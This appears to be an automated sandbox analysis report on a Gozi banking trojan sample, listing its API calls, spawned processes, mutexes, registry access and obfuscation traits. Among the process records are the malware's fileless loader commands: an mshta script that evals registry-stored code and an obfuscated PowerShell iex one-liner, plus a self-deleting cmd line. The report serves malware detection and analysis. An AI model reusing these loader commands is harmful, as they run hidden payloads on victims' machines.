Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	8_2_0040140F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040182F GetProcAddress,NtCreateSection,memset,	8_2_0040182F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00401ABC NtMapViewOfSection,	8_2_00401ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	8_2_010A231E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A5D85 GetProcAddress,NtCreateSection,memset,	8_2_010A5D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A60A0 NtMapViewOfSection,	8_2_010A60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A8185 NtQueryVirtualMemory,	8_2_010A8185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	8_2_03F1B38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0D317 NtMapViewOfSection,	8_2_03F0D317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F21AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	8_2_03F21AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0D274 NtQueryInformationProcess,	8_2_03F0D274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F229E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	8_2_03F229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F0317C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	8_2_03F0696A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F12931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F12931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F076E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	8_2_03F076E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1CEED GetProcAddress,NtCreateSection,memset,	8_2_03F1CEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F17523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	8_2_03F17523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F08C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	8_2_03F08C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F10B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F10B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F10A74 NtReadVirtualMemory,	8_2_03F10A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F2389B NtGetContextThread,RtlNtStatusToDosError,	8_2_03F2389B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	8_2_03F0483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F03F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	8_2_03F03F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F17EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	8_2_03F17EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F01641 memset,NtQueryInformationProcess,	8_2_03F01641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0155B NtQuerySystemInformation,RtlNtStatusToDosError,	8_2_03F0155B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1E4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	8_2_03F1E4D5
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E69994 NtReadVirtualMemory,	28_2_00E69994
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E56140 NtAllocateVirtualMemory,	28_2_00E56140
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E51B84 NtQueryInformationProcess,	28_2_00E51B84
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	28_2_00E6AC44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E73C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	28_2_00E73C1C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7B58C NtSetContextThread,NtUnmapViewOfSection,NtClose,	28_2_00E7B58C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E70E70 NtMapViewOfSection,	28_2_00E70E70
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5E614 NtCreateSection,	28_2_00E5E614
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E51FBC NtWriteVirtualMemory,	28_2_00E51FBC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5FF60 RtlAllocateHeap,NtQueryInformationProcess,	28_2_00E5FF60
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E8F01F NtProtectVirtualMemory,NtProtectVirtualMemory,	28_2_00E8F01F
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA81B84 NtQueryInformationProcess,	36_2_0000020FDEA81B84
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	36_2_0000020FDEA9AC44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEABF00B NtProtectVirtualMemory,NtProtectVirtualMemory,	36_2_0000020FDEABF00B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303D274 NtQueryInformationProcess,	47_2_0303D274
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03051AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	47_2_03051AE3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030529E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	47_2_030529E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03047523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	47_2_03047523
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03031641 memset,NtQueryInformationProcess,	47_2_03031641
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03047EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	47_2_03047EEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303155B NtQuerySystemInformation,RtlNtStatusToDosError,	47_2_0303155B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304E4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	47_2_0304E4D5

Sample file is different than original file name gathered from version info

Source: gozi.exe	Binary or memory string: OriginalFilename vs gozi.exe
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAdMunch.exe6 vs gozi.exe
Source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEventManager.dll: vs gozi.exe

Source: gozi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: gozi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gozi.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@35/22@10/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: gozi.exe	Virustotal: Detection: 38%
Source: gozi.exe	Metadefender: Detection: 40%
Source: gozi.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\gozi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gozi.exe "C:\Users\user\Desktop\gozi.exe"
Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1

Jump to behavior

Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `users` (`Login`, `Password`, `Role`) VALUES(@uLogin, @uPassword, @uRole);
Source: gozi.exe	Binary or memory string: SELECT * FROM `transport`;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `transport` (`Type`, `Consumption`) VALUES(@uType, @uCons);
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `waybills` (`DriverId`, `TransportId`, `Distance`, `Price`, `Date`) VALUES(@DriverId, @TransportId, @Distance, @Price, @Date);
Source: gozi.exe	Binary or memory string: SELECT * FROM `drivers` WHERE `Login` = @uLogin;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: SELECT * FROM `users` WHERE `Login` = @uLogin AND `Password` = @uPassword;
Source: gozi.exe	Binary or memory string: SELECT * FROM `drivers` WHERE `Id` = @Id;
Source: gozi.exe	Binary or memory string: SELECT * FROM `transport` WHERE `Id` = @Id;
Source: gozi.exe	Binary or memory string: SELECT * FROM `waybills`;

Source: C:\Users\user\Desktop\gozi.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A1141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

8_2_010A1141

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C2944618-39CD-4415-D316-7DB8B7AA016C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C68D421A-6D0A-E8E8-275A-F19C4B2EB590}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6E68996D-F514-D0A1-EF82-F90493D63D78}
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3AB6673A-5150-7C4D-AB0E-15700F2219A4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{22921B96-19EB-A4D9-B376-5D18970AE1CC}

Source: gozi.exe, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\gozi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\gozi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: gozi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: gozi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: gozi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source:	Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: gozi.exe, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB72E push ecx; ret	8_2_010AB734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7F4F push ecx; ret	8_2_010A7F5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7BE0 push ecx; ret	8_2_010A7BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB804 push 00000055h; iretd	8_2_010AB808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB6BE push ebp; retf	8_2_010AB6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F2541F push ecx; ret	8_2_03F2542F
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E772FD push 3B000001h; retf	28_2_00E77302
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA72FD push 3B000001h; retf	36_2_0000020FDEAA7302
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03055070 push ecx; ret	47_2_03055079
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03053D42 push ss; ret	47_2_03053D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0305541F push ecx; ret	47_2_0305542F

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress,

8_2_004012E6

Binary contains a suspicious time stamp

Source: gozi.exe

Static PE information: 0xBF44DD64 [Tue Sep 8 18:09:40 2071 UTC]

Compiles C# or VB.Net code

